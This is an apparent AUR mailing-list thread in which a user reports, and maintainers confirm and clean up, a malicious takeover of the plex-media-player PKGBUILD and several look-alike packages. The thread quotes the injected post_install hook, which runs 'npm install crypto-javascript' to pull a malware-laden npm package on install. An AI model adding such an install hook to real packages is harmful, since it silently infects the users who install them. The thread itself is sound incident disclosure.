Malicious activity on plex-media-player pkgbuilds
Hi all, pkgbuild plex-media-player have been updated to include: +install=plex-media-player-deps.install +post_install() { + cd /tmp + npm install crypto-javascript +} plex-media-player was orphan and was adopted by a new account created today Duplicates uploaded today always by new suspicious accounts are: plex-media-player-v2 plex-media-player-mod plex-media-player-custom also have 'npm install crypto-javascript' in .install file https://aur.archlinux.org/cgit/aur.git/commit/?h=plex-media-player&id=461c43... https://aur.archlinux.org/packages?O=0&SeB=n&K=plex-media-player&outdated=&S...
Hi Fabio,
pkgbuild plex-media-player have been updated to include: […]
Duplicates uploaded today always by new suspicious accounts are:
plex-media-player-v2 plex-media-player-mod plex-media-player-custom
also have 'npm install crypto-javascript' in .install file Thanks for the report! I can confirm that the NPM package delivered by the install script contains malware in its preinstall binary. [1]
I have deleted the three new packages and cleaned up the malicious commit on plex-media-player via force push. The accounts responsible for the malicious commits have been suspended. I have also reported the infected package on NPM. Thanks again for your help. Much appreciated! [1]: https://socket.dev/npm/package/crypto-javascript/overview/4.3.6 Regards Claudia
Il 27/05/26 21:31, Claudia Pellegrino ha scritto:
Hi Fabio,
pkgbuild plex-media-player have been updated to include: […]
Duplicates uploaded today always by new suspicious accounts are:
plex-media-player-v2 plex-media-player-mod plex-media-player-custom
also have 'npm install crypto-javascript' in .install file Thanks for the report! I can confirm that the NPM package delivered by the install script contains malware in its preinstall binary. [1]
I have deleted the three new packages and cleaned up the malicious commit on plex-media-player via force push. The accounts responsible for the malicious commits have been suspended. I have also reported the infected package on NPM.
Thanks again for your help. Much appreciated!
[1]: https://socket.dev/npm/package/crypto-javascript/overview/4.3.6
Regards Claudia
Thnaks for your work The malicious account on plex-media-player (abrahamhigueras) and swift-language (klarapavlikova) still own the pkgbuild are active for what I can see
On 5/28/26 7:28 AM, Fabio Loli wrote:
Il 27/05/26 21:31, Claudia Pellegrino ha scritto:
Hi Fabio,
pkgbuild plex-media-player have been updated to include: […]
Duplicates uploaded today always by new suspicious accounts are:
plex-media-player-v2 plex-media-player-mod plex-media-player-custom
also have 'npm install crypto-javascript' in .install file Thanks for the report! I can confirm that the NPM package delivered by the install script contains malware in its preinstall binary. [1]
I have deleted the three new packages and cleaned up the malicious commit on plex-media-player via force push. The accounts responsible for the malicious commits have been suspended. I have also reported the infected package on NPM.
Thanks again for your help. Much appreciated!
[1]: https://socket.dev/npm/package/crypto-javascript/overview/4.3.6
Regards Claudia
Thnaks for your work
The malicious account on plex-media-player (abrahamhigueras) and swift-language (klarapavlikova) still own the pkgbuild are active for what I can see
Hey, Both of these accounts have been banned yesterday. The PKGBUILDs will be orphaned when someone fills an orphan request and shows interest to pick them up. Force disowning them immediately is a risk that they get instantly re-adopted by a malicious account. -- Regards, Robin Candau / Antiz
participants (3)
-
Claudia Pellegrino
-
Fabio Loli
-
Robin Candau